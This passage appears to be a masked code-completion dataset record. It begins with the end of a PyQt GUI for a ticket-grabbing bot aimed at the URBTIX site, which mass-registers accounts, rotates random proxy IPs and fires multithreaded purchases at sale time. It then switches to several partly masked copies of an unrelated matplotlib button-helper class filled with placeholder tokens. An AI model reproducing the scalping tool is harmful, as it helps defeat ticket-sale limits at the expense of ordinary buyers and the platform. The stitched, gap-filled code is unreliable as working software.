encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n # 多线程\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr,ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n # 点击搜索按钮执行\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append(\"正在查询 %s 的所有场次和价格...\" % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append(\"请等待...\")\n 
self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n\n # 把选择的场次和价格显示到主界面\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n # if self.ex.sessionName and self.ex.sessionPrice:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i,eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i,price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)# 价格\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n # 把信息刷新到界面\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append(\"查询成功,请在选择界面选择场次和价格...\")\n global SESSION_DATA\n SESSION_DATA = True\n # ex.create_c()\n else:\n self.textBrowser_1.append(\"查询失败,请确定您查询的节目存在...\")\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append(\"查询失败,请确定您查询的节目存在...\")\n print(err)\n sys.exit()\n\n # 日志更新\n def output_login_status(self):\n # 登录成功输出\n while True:\n # 登陆日志\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n # 购买日志\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if \"购买成功\" in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n 
self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n # 注册日志\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n\n # 购买条件选择后点击执行\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append(\"请输入购买总数量...\")\n return\n\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append(\"正在购买,请等待...\")\n return\n\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append(\"开始购买,请您耐心等待...\")\n\n def wait_sale(self):\n dateList = ex.saleTime\n print(\"%s年%s月%s日%s时开始售票,等待购买!\" % tuple(dateList))\n self.textBrowser_1.append(\"%s年%s月%s日%s时开始售票,等待购买!\" % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) + '0000', \"%Y%m%d%H%M%S\")))\n if saleTimestamp <= int(time.time()):\n print(\"%s年%s月%s日%s时开始售票,开始购买!\" % tuple(dateList))\n self.textBrowser_1.append(\"%s年%s月%s日%s时开始售票,开始购买!\" % tuple(dateList))\n break\n time.sleep(1)\n\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append(\"开始购买,请您耐心等待...\")\n\n\n #点击注册执行并打印注册 \n def register(self):\n self.textBrowser_3.append(\"开始注册,请等待...\")\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) 
# 提示框\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n # 退出程序\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.Yes | QMessageBox.No) # 提示框\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网') # 主窗口\n self.resize(680, 800)\n # 取消最大化\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n # 固定窗口大小\n self.setFixedSize(self.width(), self.height())\n\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n # 把布局放入到 w 窗口\n # 创建一个滚动条\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller) # 滚动条放self.topFiller\n\n self.vbox = QVBoxLayout() # 方框布局\n self.vbox.addWidget(self.scroll) # 滚动条放入布局\n self.w.setLayout(self.vbox)\n\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self,'提示','您确定选择无误吗?',QMessageBox.Yes|QMessageBox.No,QMessageBox.No) #两个按钮是否, 默认No则关闭这个提示框\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n #新建全选复选框对象\n self.cb1 = QCheckBox('全选',self.topFiller)\n self.cb1.move(20,30)\n self.cb2 = QCheckBox('全选',self)\n self.cb2.move(20, 570)\n # 创建按钮\n bt1 = QPushButton('确定',self)\n bt2 = QPushButton('刷新',self)\n\n bt1.move(20,760)\n bt2.move(120,760)\n\n # 每当复选框的状态改变时,即每当用户选中或取消选中该信号时,就会发出此信号。\n # 
所以当产生此信号的时候,我们将其连接相应的槽函数。\n self.cb1.stateChanged.connect(self.changecb1) # 全选复选框连接到全选槽函数\n self.cb2.stateChanged.connect(self.changecb2) # 全选复选框连接到全选槽函数\n bt1.clicked.connect(self.pitch_on) # 连接到显示选中单元\n bt2.clicked.connect(self.create_c) # 连接到创建函数\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0]['priceList']]\n # print(self.priceList)\n # print(self.sessionList)\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n\n # 清空上次搜索内容\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n\n # 场次信息显示\n for i,item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60+30*i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580,(len(self.sessionList)+5)*30) #设置滚动条的尺寸\n\n # 价格显示\n for i,item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570+30*i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570+30*i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn: # 遍历所有复选框\n if i.isChecked(): # 判断是否被选中\n for eventDate in self.eventDateList: # 遍历所有的数据\n if eventDate['eventDateName'] == i.text(): # 判断数据是否被选中\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n # print(eventDate['saleDate'])\n self.eventUrl.append(eventDate[\"eventUrl\"]) # 被选中则保存\n self.sessionName.append(eventDate['eventDateName'])\n\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n 
self.eventPrice.append(str(self.eventDateList[0]['priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n\n # 如果选择的有数据,则关闭窗口,没有数据,提示选择数据\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No) # 两个按钮是否, 默认No则关闭这个提示框\n if res == QMessageBox.Yes:\n self.close()\n else:\n print(\"输入内容不存在!\")\n\n # 全选复选框槽函数\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n # 全选复选框槽函数\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n # 刷新按钮\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv) # 创建一个QApplication,也就是你要开发的软件app\n ex = Example()\n MainWindow = QtWidgets.QMainWindow() # 创建一个QMainWindow,用来装载你需要的各种组件、控件\n ui = Ui_MainWindow() # ui是你创建的ui类的实例化对象\n ui.setupUi(MainWindow) # 执行类中的setupUi方法,方法的参数是第二步中创建的QMainWindow\n MainWindow.show() # 执行QMainWindow的show()方法,显示这个QMainWindow\n # ex.show()\n sys.exit(app.exec_())\n\n",
"step-ids": [
25,
26,
30,
32,
33
]
}
|
[
25,
26,
30,
32,
33
] |
<|reserved_special_token_0|>
class Add_Buttons(object):
<|reserved_special_token_0|>
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval, maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue, minvalue
=minval, maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
<|reserved_special_token_0|>
def button_region(self, event):
if len(self.regions) == 0:
return None
x, y = event.x, event.y
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
for r, rn in enumerate(self.regions):
rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
(rn[1] + rn[3]) * height]
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
Adds a select rectangle feature to any matplotlib axis, with select,
clear all, and finish buttons
:param ax: matplotlib axis, the frame to add the selector to
:param kwargs: kwargs passed to the rectangle selector
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=
self.end, OPTION=self.option, UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
self.buttons = []
self.regions = []
self.result = 0
self.data = dict()
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
dparams = [dict()] * self.num_buttons
self.button_params = kwargs.get('button_params', dparams)
self.validate_inputs()
self.create_buttons()
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    def previous(self, event):
        """
        Event for clicking a button with action "PREVIOUS"

        Sets self.result to -1 so the caller knows to step back one plot.

        :param event: matplotlib button-press event (unused)
        :return:
        """
        self.result = -1
    def option(self, event):
        """
        Event for clicking a button with action "OPTION"

        Sets self.result to button_label[i] where i is the position in
        button_label and button_action of the button clicked.  Optionally
        runs a per-button callback ('func') and closes the plot ('close').

        :param event: matplotlib button-press event
        :return:
        """
        # Work out which button's screen region was clicked (None = miss).
        pos = self.button_region(event)
        if pos is not None:
            self.result = self.button_labels[pos]
            # Per-button options: 'close' closes the figure afterwards,
            # 'func' is an optional zero-argument callback.
            close = self.button_params[pos].get('close', False)
            func = self.button_params[pos].get('func', None)
            if func is not None:
                func()
            if close:
                plt.close()
    def uinput(self, event):
        """
        Event for clicking a button with action "UINPUT"

        Pops up a Tk dialog asking the user for a value and stores the
        answer in self.data under the button's configured 'name'.

        :param event: matplotlib button-press event
        :return:
        """
        pos = self.button_region(event)
        if pos is not None:
            props = self.button_params[pos]
            # Dialog configuration; every key is optional with a fallback.
            title = props.get('title', 'Enter a Value')
            startvalue = props.get('comment', 'Message')
            name = props.get('name', 'x')
            fmt = props.get('fmt', None)
            minval = props.get('minval', None)
            maxval = props.get('maxval', None)
            # A hidden Tk root window hosts the modal dialog.
            root = tkinter.Tk()
            root.withdraw()
            # Dispatch on the requested value type; default is a string.
            if fmt == int:
                value = tksimpledialog.askinteger(title, startvalue,
                    minvalue=minval, maxvalue=maxval)
            elif fmt == float:
                value = tksimpledialog.askfloat(title, startvalue, minvalue
                    =minval, maxvalue=maxval)
            else:
                value = tksimpledialog.askstring(title, startvalue)
            self.data[name] = value
            root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
    def button_region(self, event):
        """
        Return the index of the button whose on-screen region contains
        the click, or None when the click misses every region.

        Regions are stored as [x0, y0, w, h] in figure-fraction units and
        scaled by the current canvas size before the hit test.

        :param event: matplotlib button-press event (pixel coords x/y)
        :return: int index into self.regions, or None
        """
        if len(self.regions) == 0:
            return None
        x, y = event.x, event.y
        # NOTE(review): canvas.geometry() looks Qt-backend-specific —
        # confirm the figure always uses a Qt backend.
        width = event.canvas.geometry().width()
        height = event.canvas.geometry().height()
        for r, rn in enumerate(self.regions):
            # Convert [x0, y0, w, h] fractions to pixel corner coords.
            rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
                (rn[1] + rn[3]) * height]
            cond1 = (x > rn1[0]) & (x < rn1[2])
            cond2 = (y > rn1[1]) & (y < rn1[3])
            if cond1 and cond2:
                return r
        return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Add_Buttons(object):
    def __init__(self, ax=None, **kwargs):
        """
        Attach a row of action buttons to a matplotlib figure.

        :param ax: matplotlib axis to attach to; defaults to plt.gca()
        :param kwargs: button configuration:

            button_labels - list of str, one display name per button
                            (must contain at least one entry)
            button_actions - list of str, same length as button_labels,
                             naming each button's behaviour:
                               "NEXT"     - sets self.result to 1
                                            (move to the next plot)
                               "PREVIOUS" - sets self.result to -1
                                            (move to the previous plot)
                               "CLOSE"    - closes the plot
                               "OPTION"   - sets self.result to the
                                            button's label
                               "UINPUT"   - asks the user for an input
            button_params - optional list of dicts, same length as
                            button_labels, per-button settings
                            (e.g. "close" - with an "OPTION" action,
                            close the plot after the click)
        """
        # Dispatch table mapping each action keyword to its handler.
        self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=
            self.end, OPTION=self.option, UINPUT=self.uinput)
        self.supported_actions = list(self.actions.keys())
        # Widget bookkeeping and user-visible state.
        self.buttons = []
        self.regions = []
        self.result = 0
        self.data = dict()
        if ax is None:
            self.ax = plt.gca()
        else:
            self.ax = ax
        if kwargs is None:
            kwargs = dict()
        # Button configuration with single-"Close"-button defaults.
        self.button_labels = kwargs.get('button_labels', ['Close'])
        self.num_buttons = len(self.button_labels)
        self.button_actions = kwargs.get('button_actions', ['CLOSE'])
        dparams = [dict()] * self.num_buttons
        self.button_params = kwargs.get('button_params', dparams)
        # Validate the configuration, then build the widgets.
        self.validate_inputs()
        self.create_buttons()
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
def create_buttons(self, width=0.2):
"""
Create a set of buttons along the bottom axis of the figure
Need to re-write this to be generic based on used input
(might not be possible as user need to define events)
:param N: int, Number of buttons, default 3
:param width: float, width of the buttons in x, must be less than
1.0/N
:return:
"""
b_N, b_length = self.num_buttons, width
b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)
for b in range(b_N):
start = (b + 1) * b_sep + b * b_length
r = [start, 0.05, b_length, 0.075]
self.regions.append(r)
plt.subplots_adjust(bottom=0.25)
for b in range(b_N):
axbutton = plt.axes(self.regions[b])
button = Button(axbutton, self.button_labels[b])
button.on_clicked(self.actions[self.button_actions[b]])
self.buttons.append(button)
<|reserved_special_token_0|>
    def previous(self, event):
        """
        Event for clicking a button with action "PREVIOUS"

        Sets self.result to -1 so the caller knows to move to the
        previous plot.

        :param event: matplotlib event passed to the handler (unused)
        :return: None
        """
        self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
    def uinput(self, event):
        """
        Event for clicking a button with action "UINPUT"

        Pops up a tkinter dialog asking the user for a value and stores it
        in self.data under the 'name' key of this button's params.

        :param event: matplotlib mouse event passed to the handler
        :return: None
        """
        pos = self.button_region(event)
        if pos is not None:
            # dialog configuration comes from this button's params dict
            props = self.button_params[pos]
            title = props.get('title', 'Enter a Value')
            startvalue = props.get('comment', 'Message')
            name = props.get('name', 'x')
            fmt = props.get('fmt', None)
            minval = props.get('minval', None)
            maxval = props.get('maxval', None)
            # hidden root window so only the dialog itself is shown
            root = tkinter.Tk()
            root.withdraw()
            # pick the dialog matching the requested value type
            if fmt == int:
                value = tksimpledialog.askinteger(title, startvalue,
                    minvalue=minval, maxvalue=maxval)
            elif fmt == float:
                value = tksimpledialog.askfloat(title, startvalue, minvalue
                    =minval, maxvalue=maxval)
            else:
                value = tksimpledialog.askstring(title, startvalue)
            self.data[name] = value
            root.destroy()
    def end(self, event):
        """
        Event for clicking the finish button - closes the graph

        Closes the current matplotlib figure via plt.close().

        :param event: event passed to function (unused)
        :return: None
        """
        plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
x, y = event.x, event.y
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
for r, rn in enumerate(self.regions):
rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
(rn[1] + rn[3]) * height]
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Add_Buttons(object):
    """
    Adds a row of configurable buttons along the bottom of a matplotlib
    figure; each button is bound to one of the supported actions
    (NEXT, PREVIOUS, CLOSE, OPTION, UINPUT).
    """

    def __init__(self, ax=None, **kwargs):
        """
        Adds a select rectangle feature to any matplotlib axis, with select,
        clear all, and finish buttons

        :param ax: matplotlib axis, the frame to add the selector to
        :param kwargs: keyword arguments, currently supported:

            button_labels - list of strings
                            defines the name of each button to be displayed
                            Must be of length 1 or greater
            button_actions - list of strings
                             defines the action of each button. Must be same
                             length as button_labels
                             currently supported actions are:
                             "NEXT" - move to next plot (self.result set to 1)
                             "PREVIOUS" - move to previous plot
                                          (self.result set to -1)
                             "CLOSE" - closes the plot
                             "OPTION" - self.result set to the button label
                             "UINPUT" - asks user for an input
            button_params - list of dictionaries (optional)
                            if defined must be same length as button_labels,
                            one dictionary per button; keys include
                            "close" - when used with "OPTION" action, close
                                      the plot after the button is clicked
        """
        # map each supported action name to its handler method
        self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=
            self.end, OPTION=self.option, UINPUT=self.uinput)
        self.supported_actions = list(self.actions.keys())
        # Button widgets and their regions (in figure-fraction coordinates)
        self.buttons = []
        self.regions = []
        # result of the last button press (1, 0, -1, or a button label)
        self.result = 0
        # values collected from UINPUT dialogs, keyed by each button's 'name'
        self.data = dict()
        # default to the current axis when none is supplied
        if ax is None:
            self.ax = plt.gca()
        else:
            self.ax = ax
        if kwargs is None:
            kwargs = dict()
        self.button_labels = kwargs.get('button_labels', ['Close'])
        self.num_buttons = len(self.button_labels)
        self.button_actions = kwargs.get('button_actions', ['CLOSE'])
        # bug fix: build one distinct dict per button -- ``[dict()] * n``
        # would alias a single shared dict across every button
        dparams = [dict() for _ in range(self.num_buttons)]
        self.button_params = kwargs.get('button_params', dparams)
        self.validate_inputs()
        self.create_buttons()

    def validate_inputs(self):
        """
        Validate the button configuration supplied to the constructor.

        :raises TypeError: if button_labels/button_actions are not lists of
                           strings, or button_params is not a list of dicts
        :raises ValueError: if the lists are empty or mismatched in length,
                            or an action is not a supported action
        """
        # button_labels must be a list of strings
        try:
            self.button_labels = list(self.button_labels)
            for it in self.button_labels:
                if type(it) != str:
                    raise TypeError()
        except TypeError:
            raise TypeError('Button labels must be a list of strings')
        # button_actions must be a list of strings
        # (bug fix: this loop previously iterated over button_labels)
        try:
            self.button_actions = list(self.button_actions)
            for it in self.button_actions:
                if type(it) != str:
                    raise TypeError()
        except TypeError:
            raise TypeError('Button actions must be a list of strings')
        # button_params must be a list of dicts
        # (bug fix: this previously re-listified button_actions instead of
        # button_params)
        try:
            self.button_params = list(self.button_params)
            for it in self.button_params:
                if type(it) != dict:
                    raise TypeError()
        except TypeError:
            raise TypeError('Button params must be a list of dictionaries')
        # labels must be non-empty and the same length as actions
        if len(self.button_labels) < 1:
            raise ValueError(
                "'button_labels' Must have at least one button label in list.")
        if len(self.button_actions) != len(self.button_labels):
            raise ValueError(
                "'button_actions' must be the same length as 'button_labels")
        self.num_buttons = len(self.button_labels)
        # every requested action must be one of the supported actions
        sstr = ', '.join(self.supported_actions)
        for action in self.button_actions:
            if action not in self.supported_actions:
                e1 = "Action '{0}' not currently".format(action)
                e2 = 'supported. \n Currently supported actions are: \n'
                raise ValueError(e1 + e2 + sstr)

    def create_buttons(self, width=0.2):
        """
        Create a set of buttons along the bottom axis of the figure.

        :param width: float, width of each button in figure fraction; must
                      be less than 1.0/num_buttons
        :return: None
        """
        b_N, b_length = self.num_buttons, width
        # even horizontal gap so the row is spread across the figure
        b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)
        for b in range(b_N):
            start = (b + 1) * b_sep + b * b_length
            self.regions.append([start, 0.05, b_length, 0.075])
        # make room for the button row below the main axes
        plt.subplots_adjust(bottom=0.25)
        # create one widget per region and bind its action handler
        for b in range(b_N):
            axbutton = plt.axes(self.regions[b])
            button = Button(axbutton, self.button_labels[b])
            button.on_clicked(self.actions[self.button_actions[b]])
            self.buttons.append(button)

    def next(self, event):
        """
        Event for clicking a button with action "NEXT"; sets self.result
        to 1.

        :param event: matplotlib event passed to the handler (unused)
        :return: None
        """
        self.result = 1

    def previous(self, event):
        """
        Event for clicking a button with action "PREVIOUS"; sets self.result
        to -1.

        :param event: matplotlib event passed to the handler (unused)
        :return: None
        """
        self.result = -1

    def option(self, event):
        """
        Event for clicking a button with action "OPTION"

        Sets self.result to the label of the clicked button, runs the
        optional 'func' callback and closes the plot if 'close' is set.

        :param event: matplotlib mouse event passed to the handler
        :return: None
        """
        pos = self.button_region(event)
        if pos is not None:
            self.result = self.button_labels[pos]
            close = self.button_params[pos].get('close', False)
            func = self.button_params[pos].get('func', None)
            if func is not None:
                func()
            if close:
                plt.close()

    def uinput(self, event):
        """
        Event for clicking a button with action "UINPUT"

        Pops up a tkinter dialog asking the user for a value; the value is
        stored in self.data under the 'name' key of the button's params.

        :param event: matplotlib mouse event passed to the handler
        :return: None
        """
        pos = self.button_region(event)
        if pos is not None:
            props = self.button_params[pos]
            title = props.get('title', 'Enter a Value')
            startvalue = props.get('comment', 'Message')
            name = props.get('name', 'x')
            fmt = props.get('fmt', None)
            minval = props.get('minval', None)
            maxval = props.get('maxval', None)
            # hidden root window so only the dialog itself is shown
            root = tkinter.Tk()
            root.withdraw()
            # pick the dialog matching the requested value type
            if fmt == int:
                value = tksimpledialog.askinteger(title, startvalue,
                                                  minvalue=minval,
                                                  maxvalue=maxval)
            elif fmt == float:
